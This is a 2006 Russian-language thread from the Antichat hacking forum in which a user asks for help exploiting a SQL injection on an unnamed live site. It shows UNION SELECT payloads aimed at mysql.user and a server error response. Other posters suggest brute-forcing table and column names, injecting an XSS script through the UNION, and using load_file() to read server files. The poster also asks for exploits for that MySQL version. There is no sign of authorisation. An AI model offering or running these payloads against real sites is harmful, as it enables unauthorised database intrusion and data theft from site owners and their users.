Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Sql-inj MySQL Проблемы с запросом. |
10.09.2006, 22:26
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396
Репутация:
5
|
|
Sql-inj MySQL Проблемы с запросом.
Всем доброго(ой) вечера\ночи!
Уважаемые!
Подсабите хорошим словом =)
Наткунлся на SQL-инъекцию (MYSQL - 4.1.20-standard).
Код HTML:
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8,9+from+mysql.user+where+id=1/*
пишет...
SELECT command denied to user '........'@'localhost' for table 'user' SQL query : select cityID, fd_type, fd_title, fd_number, art_title, date, art_url, html, pdf from mytable_press WHERE id = -1 union select 1,2,user(),null,database(),null,7,8,9 from mysql.user where id=1/* ORDER BY date DESC;
SELECT command denied to user '........'@'localhost' - Конец истории? или есть продолжение.
Подскажите пожалуйста.
С уважением. |
|
|
10.09.2006, 22:41
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
SELECT command denied to user '........'@'localhost'
SELECT запрещен юзеру '........'@'localhost'
т.е. настройки таковы, что юзеру не доступна база "mysql", а только созданные этим юзером базы.
Это свидетельствует о здравом рассудке сисадмина. Пробуй что-то другое.
|
|
|
|
10.09.2006, 23:52
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396
Репутация:
5
|
|
Да вот именно что попробывал всё что знал, и в итоге НОЛЬ.
Может кто что-то подскажет ???
|
|
|
|
10.09.2006, 23:56
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*
а просто так пробовал
|
|
|
|
11.09.2006, 00:15
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396
Репутация:
5
|
|
Сообщение от Goudini
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*
а просто так пробовал
Пробывал.
Выдает только инфу про базу.
user() - пишет на странице юзера
database() базу
version() - и пишет версию....
|
|
|
|
11.09.2006, 00:32
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Сообщение от m2infect
Пробывал.
Выдает только инфу про базу.
user() - пишет на странице юзера
database() базу
version() - и пишет версию....
Вот и всё, в базу mysql тебя не пустит. Можеш попробовать подоставать что-то ещё с этой базы, может там форум есть, тогда названия таблиц известны......
|
|
|
|
11.09.2006, 01:42
|
|
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396
Репутация:
5
|
|
к таблице MySQL меня не пустили.
Записать файл, а так же прочитать файлы - тоже не дали.
Вроде все способы попробывал.
Не уже то не уязвима?
Может кто сплоиты знает к этой версии?  |
|
|
|
11.09.2006, 18:03
|
|
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418
Репутация:
23
|
|
Попробуй подобрать названия таблиц с юзерами: user, users, username, uname и т.д. потом надо подбирать колонки.
|
|
|
|
11.09.2006, 18:38
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Пробуй осуществить XSS (как я понял - у тебя не blind инъекция) :
iew&aid=-1+union+select+1,2,<script>alert();</script>,null,5,null,7,8,9+from+mysql.user+where+id =1/*
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|
|
11.09.2006, 20:01
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Load_file()
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
